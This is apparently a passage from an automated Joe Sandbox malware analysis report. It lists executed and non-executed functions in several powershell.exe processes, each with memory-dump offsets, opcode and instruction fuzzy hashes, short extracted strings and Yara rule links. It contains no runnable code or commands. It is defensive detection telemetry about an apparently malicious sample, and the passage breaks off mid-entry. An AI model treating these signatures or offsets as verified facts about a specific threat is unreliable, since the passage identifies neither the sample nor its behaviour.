Source File: 00000001.00000002.1783171427.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c671067ca943b75b2bdacfce0b721934b48cc2f5b9f6d5a72a0071d818ab5cf1
Instruction ID: 37b36513034b6ad6aff8b357b4ed0f30b440f5868c89af53f738a894d4a245ec
Opcode Fuzzy Hash: c671067ca943b75b2bdacfce0b721934b48cc2f5b9f6d5a72a0071d818ab5cf1
Instruction Fuzzy Hash: 75F0BE32A0E5498FD769EB9CE0619A873E0FF0532074600BAE05DCB1A3CA26AC40C740

Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1783171427.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

Non-executed Functions

Function 00007FFD9B898995 Relevance: 5.1, Strings: 4, Instructions: 147COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD9B898AC2
M_^, xrefs: 00007FFD9B898A2A
M_^, xrefs: 00007FFD9B8989C9
M_^, xrefs: 00007FFD9B898A6A

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^
API String ID: 0-1397233021
Opcode ID: 5b6dd1f1874661e8c180950e231c4f316adcc16ce144962798c87156cb7049aa
Instruction ID: 1f95817a714e5d1875c6629e38650d4102ac632d7364b4021558599f6589ea58
Opcode Fuzzy Hash: 5b6dd1f1874661e8c180950e231c4f316adcc16ce144962798c87156cb7049aa
Instruction Fuzzy Hash: 07418FA3A0F6D75FE76A476948690947FA0EF167A4B0A03F7C0D58B0E3ED1929074252

Function 00007FFD9B898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^J, xrefs: 00007FFD9B898C8A
M_^7, xrefs: 00007FFD9B898C12
M_^F, xrefs: 00007FFD9B898C7A
M_^4, xrefs: 00007FFD9B898BFA

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
Instruction ID: 67c483b31486e148cdd38e4893d325e3edbe53289e8afd099b86490093a99135
Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
Instruction Fuzzy Hash: 9321C2A7708565DED30A7B7DBC189E93740CF9427878507F3E1AACB093F91860878AD0

Analysis Process: powershell.exePID: 7700, Parent PID: 7332COMMON

Executed Functions

Function 00007FFD9B946605 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1890012841.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b7c701f251b585a08060a9ed0a65c87261bdbad516cbd38768a8aa5eb5c217
Instruction ID: 598777fac59541d110fad3849898a1349612104c3e894f6097c175316db02179
Opcode Fuzzy Hash: 41b7c701f251b585a08060a9ed0a65c87261bdbad516cbd38768a8aa5eb5c217
Instruction Fuzzy Hash: 5DD17AB2A2FBDE1FEBA59B6848645B57B92EF16310B0901FED05CC71E3DA18AD05C341

Function 00007FFD9B879750 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889417062.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a97d1e9ee057b331d8b3e0a4e122dd41a50cc9eacb0f2062f70d253e7585cd
Instruction ID: a2931c434116f90cb64b07990c23ee075b5da1b26f2153e7b5b470fe10e93aac
Opcode Fuzzy Hash: 03a97d1e9ee057b331d8b3e0a4e122dd41a50cc9eacb0f2062f70d253e7585cd
Instruction Fuzzy Hash: 7141273190DB889FDB19DF5C9C5A6A87FE0FB5A710F0441AFD089C3292CA64B815CBC2

Function 00007FFD9B87B05A Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889417062.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74c73ee3d5b61d556f0871447b4361251f236ad3950b739455eb8eca5118559
Instruction ID: 9928ee278a539cb045426c33c4624f65766412ec8e145f738c00ed2bdeb48665
Opcode Fuzzy Hash: f74c73ee3d5b61d556f0871447b4361251f236ad3950b739455eb8eca5118559
Instruction Fuzzy Hash: C3315A31A0DA4C4EDB19DF5C9C9A6F93BE4EFA5720F04413BC448C3152DA60A84ACB91

Function 00007FFD9B75EC61 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1888737551.00007FFD9B75D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B75D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b75d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf8b25d07ea24922839bc804d3839983765ec3400835be9d4489463bb94ebe36
Instruction ID: c5439a0434260adf7c84c58b97a62217d8cbab77494606f7c91339f50a59d070
Opcode Fuzzy Hash: cf8b25d07ea24922839bc804d3839983765ec3400835be9d4489463bb94ebe36
Instruction Fuzzy Hash: 5211517190CF088FE7A8DF5DE48596637E0FB98320B1106AFD449C7666D671E882CB81

Function 00007FFD9B8733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889417062.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42

Function 00007FFD9B87A0FB Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889417062.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055e26a60bda2834060e99d40cc8e8fcde5b66818fcbc014987aceae113af575
Instruction ID: 58051a213ecc2e2e6d94eba85d8b75fa1f3cb11aa97963220469cb57de341875
Opcode Fuzzy Hash: 055e26a60bda2834060e99d40cc8e8fcde5b66818fcbc014987aceae113af575
Instruction Fuzzy Hash: 19F02B3661AA8C4FDB41DF1CD8690D87FB0FF96205B0501B7D589CB071DB304A48CB91

Function 00007FFD9B94414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1890012841.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0099823f8b8c4f196a0bb014f9c191722b97312d8fe79a4a90926791828d9315
Instruction ID: 8442a82b3e2e2b0e8ced0537e363cb599aab283a3ad1cccc155368409a112861
Opcode Fuzzy Hash: 0099823f8b8c4f196a0bb014f9c191722b97312d8fe79a4a90926791828d9315
Instruction Fuzzy Hash: 64F0B432B0D5494FD768EA5CE4519A473E1EF6932071540BAE06DC71B3CE25EC41C741

Function 00007FFD9B944400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1890012841.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a3fd7422422fc3c6dd806e370f806f91edc612b5d240fb80235c3d76dac744
Instruction ID: 981a0c32c12ad66d73aaa53eedb645cca70f0d4692cc8742bfb46f0c6472ac9b
Opcode Fuzzy Hash: 08a3fd7422422fc3c6dd806e370f806f91edc612b5d240fb80235c3d76dac744
Instruction Fuzzy Hash: 4AF0E232B0E5498FD768EB9CE0609A8B3E0FF0532474600BAE15DCB5B3CA25EC40C740

Function 00007FFD9B9441D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1890012841.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: fa26efae6fe42842cdbf314e9f6a501e304cd814d59014bdd6b30dca281e3e6a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 98E01A31B1C8189FDA78DA4CE051AA973E2EBA932171241BBD14EC7671CA22ED518B80

Non-executed Functions

Function 00007FFD9B878BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

O_^Y, xrefs: 00007FFD9B878CBA
O_^<, xrefs: 00007FFD9B878C12
O_^8, xrefs: 00007FFD9B878BF2
O_^Q, xrefs: 00007FFD9B878C8A
O_^J, xrefs: 00007FFD9B878C62
O_^K, xrefs: 00007FFD9B878C6A
O_^N, xrefs: 00007FFD9B878C72
O_^?, xrefs: 00007FFD9B878C2A

Memory Dump Source

Source File: 00000004.00000002.1889417062.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
API String ID: 0-3814653101
Opcode ID: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
Instruction ID: 92b9401db0bb30895f639231a5467940bd5095e34f18903a1f3666908ef1c7bf
Opcode Fuzzy Hash: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
Instruction Fuzzy Hash: DF21F2B3A145218AD30A36BDBC959D86780DF9477A34901F3E02ECF393E918A48B8680

Analysis Process: powershell.exePID: 8000, Parent PID: 7332COMMON

Executed Functions

Function 00007FFD9B8A644D Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09430d4153c34126e0d830efe25c6529c85c039adf9cef80a3f370cf6d71ad85
Instruction ID: 872ef3b39bbcef5a69c9917b55a12fb4d6ac95d9f02ec425ae19ea6173e3fed4
Opcode Fuzzy Hash: 09430d4153c34126e0d830efe25c6529c85c039adf9cef80a3f370cf6d71ad85
Instruction Fuzzy Hash: 43D19370A18A4D8FDF98DF5CC455AE9BBE1FF68300F15416AD40DD72AACA34E881CB91

Function 00007FFD9B976605 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2036396076.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51024c616dad1d406c60d4b7d229e4172af9562ac581faba4f7cce8e83d301f6
Instruction ID: 20f6f5dce90638da316e0d311d47372b1f175430e4613f9d21a1abf88ef7756f
Opcode Fuzzy Hash: 51024c616dad1d406c60d4b7d229e4172af9562ac581faba4f7cce8e83d301f6
Instruction Fuzzy Hash: 3ED14622A2FA8E5FEBA5DB6848A55B57BD0EF56310F0901FED09CC70E3DA18AD05C341

Function 00007FFD9B8A9728 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1d150b37a85548354390f00b3a75f24cc37bb448d7016fb7faf4289f7a679b
Instruction ID: 3d5ea9590f87189f04a43164e6addf461023e0d997333b8ee49813008c8e4e8e
Opcode Fuzzy Hash: 9b1d150b37a85548354390f00b3a75f24cc37bb448d7016fb7faf4289f7a679b
Instruction Fuzzy Hash: C2415E71D0DB888FDB189F5C985A6A97FE0FF99310F10416FE08883293DA24B945C7D2

Function 00007FFD9B8A9FF3 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e729e7186844acdfb6ff260436ffe9f2e72857e9c503f315e9c2ceb7b101a71
Instruction ID: a374e47c0b3e5219cf865879b9108c7363756a10a0e5b5ac0c5d1269db4901f8
Opcode Fuzzy Hash: 1e729e7186844acdfb6ff260436ffe9f2e72857e9c503f315e9c2ceb7b101a71
Instruction Fuzzy Hash: C4419073B0A59A4FD716AB5CA8760E43F90EF55319F0900B7D0D8970A3FD1524478792

Function 00007FFD9B78E540 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2034688424.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b78d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24cfcb76c79b503d880e02fc26e23170dd1d6f2716f47dd8c3c582f3becc867
Instruction ID: b115526da33d19f7bc48e4a7a3e20d15b26df05cbe2c4b87ed9d31541a508343
Opcode Fuzzy Hash: c24cfcb76c79b503d880e02fc26e23170dd1d6f2716f47dd8c3c582f3becc867
Instruction Fuzzy Hash: 9541F57140EBC44FE7568B289C919523FF0EF56225B1A06DFE088CB1B7D729A846C792

Function 00007FFD9B8AA47C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2811ad00ff11dc176e0470e4705ecdbd649555fa25f1ae587bc0d7dfffe388f
Instruction ID: 903a84c1dfcdd91917bc7650dd5b832266f21b0f5ec679b4c3c4a39e48ae849e
Opcode Fuzzy Hash: f2811ad00ff11dc176e0470e4705ecdbd649555fa25f1ae587bc0d7dfffe388f
Instruction Fuzzy Hash: 1C212B3090DB4C4FDB59DBAC984A7E97BF0EB9A320F04416BD048C3152DA74941ACB91

Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2036396076.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c44c00bd3cc044dd1817211c9d817f85b43e40c6a8306d678bd5ebf8bcce36e
Instruction ID: 1748cd3ac0587f2b39041bec7405de693efb22a397cf1eb46b66fe2cd787a092
Opcode Fuzzy Hash: 3c44c00bd3cc044dd1817211c9d817f85b43e40c6a8306d678bd5ebf8bcce36e
Instruction Fuzzy Hash: 75F0BE32B1E5498FD768EA9CE4919A873E0EF6533071640BAE06DC76B3CA25EC41C745

Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2036396076.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfd9db47208686b851abfd8a1a076533cda2baea480b29e76a6689ea30e719d
Instruction ID: 66c365ea6b6bad11817635f5b82de5ac7e305e8696133c28f608cd1b77d3af96
Opcode Fuzzy Hash: 2dfd9db47208686b851abfd8a1a076533cda2baea480b29e76a6689ea30e719d
Instruction Fuzzy Hash: D7F0BE32A0E5498FD768EA5CE4A09A873E0FF0532075600BAE05DCB1B3CA25AC40C740

Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2036396076.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

Non-executed Functions

Function 00007FFD9B8A8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

L_^J, xrefs: 00007FFD9B8A8C7A
L_^F, xrefs: 00007FFD9B8A8C6A
L_^I, xrefs: 00007FFD9B8A8C72
L_^<, xrefs: 00007FFD9B8A8C2A
L_^6, xrefs: 00007FFD9B8A8BFA

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^6$L_^<$L_^F$L_^I$L_^J
API String ID: 0-1031638419
Opcode ID: 887ee41eb840c3575b88bb1e9db2925622a57a01fac4fbcb1af591c2fbfc1793
Instruction ID: a5b840d0c2db3ff69127c8c8df66edfaabb6974264c93a20f8ecd2169fedd3ae
Opcode Fuzzy Hash: 887ee41eb840c3575b88bb1e9db2925622a57a01fac4fbcb1af591c2fbfc1793
Instruction Fuzzy Hash: 162127B77084269ED30A77ADBC159EC7380DBD427A34951B3D368CB553EA14A08B8AE0

Function 00007FFD9B8A8995 Relevance: 5.1, Strings: 4, Instructions: 128COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B8A8AC2
L_^, xrefs: 00007FFD9B8A8A7A
L_^, xrefs: 00007FFD9B8A8A2A
L_^, xrefs: 00007FFD9B8A89C9

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 2537f1960088bce793f061a7bcd20bb1ff67b1ef534dd8b9ceac44df8969d3e5
Instruction ID: 53ab90bc3fc46cfcee84bfff8fc8f7b810bd12b191b439e680ec92f9816bb42e
Opcode Fuzzy Hash: 2537f1960088bce793f061a7bcd20bb1ff67b1ef534dd8b9ceac44df8969d3e5
Instruction Fuzzy Hash: 4E41C3A3A0F6C60FE3664B6948650947F90EF56354B8B12F6C1D48B0B3EA19390B8772

Function 00007FFD9B8A89FA Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B8A89FA
L_^, xrefs: 00007FFD9B8A8AC2
L_^, xrefs: 00007FFD9B8A8A7A
L_^, xrefs: 00007FFD9B8A8A2A

Memory Dump Source

Source File: 00000007.00000002.2035462002.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 271038094e2c661ec8769f79a3249f75e70d9234a7f5099df2382f233ea6d215
Instruction ID: 7b797fc5de367f29e37d9ee11b55899e2792dff89aface9a94f4ce78a9ada1d7
Opcode Fuzzy Hash: 271038094e2c661ec8769f79a3249f75e70d9234a7f5099df2382f233ea6d215
Instruction Fuzzy Hash: A931D3B3A0E9C60BE3664B5948650946F90FF56258B8B13F6D1E85B0A3FE2834074672

Analysis Process: powershell.exePID: 5676, Parent PID: 7332COMMON

Executed Functions

Function 00007FFD9B9630E9 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2222091375.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab7045ff3986db472a04c1df48e40054ce91dcbe080abf92cd7d223054922d5
Instruction ID: 04153ea0b48f22d11d827cb3f8c656b88afdfa9f9e4738da38f058377c6b96a8
Opcode Fuzzy Hash: 1ab7045ff3986db472a04c1df48e40054ce91dcbe080abf92cd7d223054922d5
Instruction Fuzzy Hash: E0122722B1EBCD5FE7A6966C58655707BE1EF96220B0A01FBD08DC71E3ED18AD068341

Function 00007FFD9B966605 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2222091375.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7cf83f0f49f78ed1724b25a39459b32850659d37ff030a47feeed3553b1446
Instruction ID: a020633d0ada22ae30c2d372e81082cd2d81d1842cff3591a67916afe26f6e13
Opcode Fuzzy Hash: ef7cf83f0f49f78ed1724b25a39459b32850659d37ff030a47feeed3553b1446
Instruction Fuzzy Hash: F5D13732A1FB8E9FEBA59BA858644B57BD0EF56310B0901FED05DCB0E3D918A905C341

Function 00007FFD9B963360 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2222091375.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ccf8cd0c2bc3e5c8d7a11d947eef81f439a4bacdc6824433f78ebecb5a21a0
Instruction ID: 5de2c531a26cbf75466a3c6f02b3dd02baf7691282cfb5c81e1f801ce5ab142d
Opcode Fuzzy Hash: d9ccf8cd0c2bc3e5c8d7a11d947eef81f439a4bacdc6824433f78ebecb5a21a0
Instruction Fuzzy Hash: 22515622B2EA8D5FE3B6D66C18A553077D2EF94310B4A01BED45DC71E3ED19AC028341

Function 00007FFD9B899750 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2221044812.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf57866615d31facba6a138466412f55162934198036928c847bf25a0332395
Instruction ID: f418879cc095fab85e02ded8def42236286cb0ae4383ebcce8558ccdeb0fb32a
Opcode Fuzzy Hash: dcf57866615d31facba6a138466412f55162934198036928c847bf25a0332395
Instruction Fuzzy Hash: 25414A7190DB888FDB19DF5C9C5A6A97FF0FB59310F0441AFE099C3292CA24A905CBC2

Function 00007FFD9B77EE24 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2219917357.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d0bc14fe2edcefd761508ba80e5a95925d61461ac8cbd01eaaf3e9383e2b5f
Instruction ID: b8f93a1e5f46c41396949e2880a0cdff0d9243c19b111f4183dc1b3573432fe8
Opcode Fuzzy Hash: 61d0bc14fe2edcefd761508ba80e5a95925d61461ac8cbd01eaaf3e9383e2b5f
Instruction Fuzzy Hash: 8A41397140EBC84FE7569B3898919523FF0EF53320B1A06EFD088CB1B3D665A846C792

Function 00007FFD9B89A49C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2221044812.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2ef154f2cbd74e84dbccf584a3a7fceb88a73a305ce42cecd419a87362f4da
Instruction ID: 5c2df564aa6844f0c095a4e707254f0f0a1ed5a171f533d895b639c9f99b2118
Opcode Fuzzy Hash: 5d2ef154f2cbd74e84dbccf584a3a7fceb88a73a305ce42cecd419a87362f4da
Instruction Fuzzy Hash: B821FB3190C74C4FDB59DBAC984A7E97FF0EB96321F04426BD048C3152DA74A45ACB91

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2221044812.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

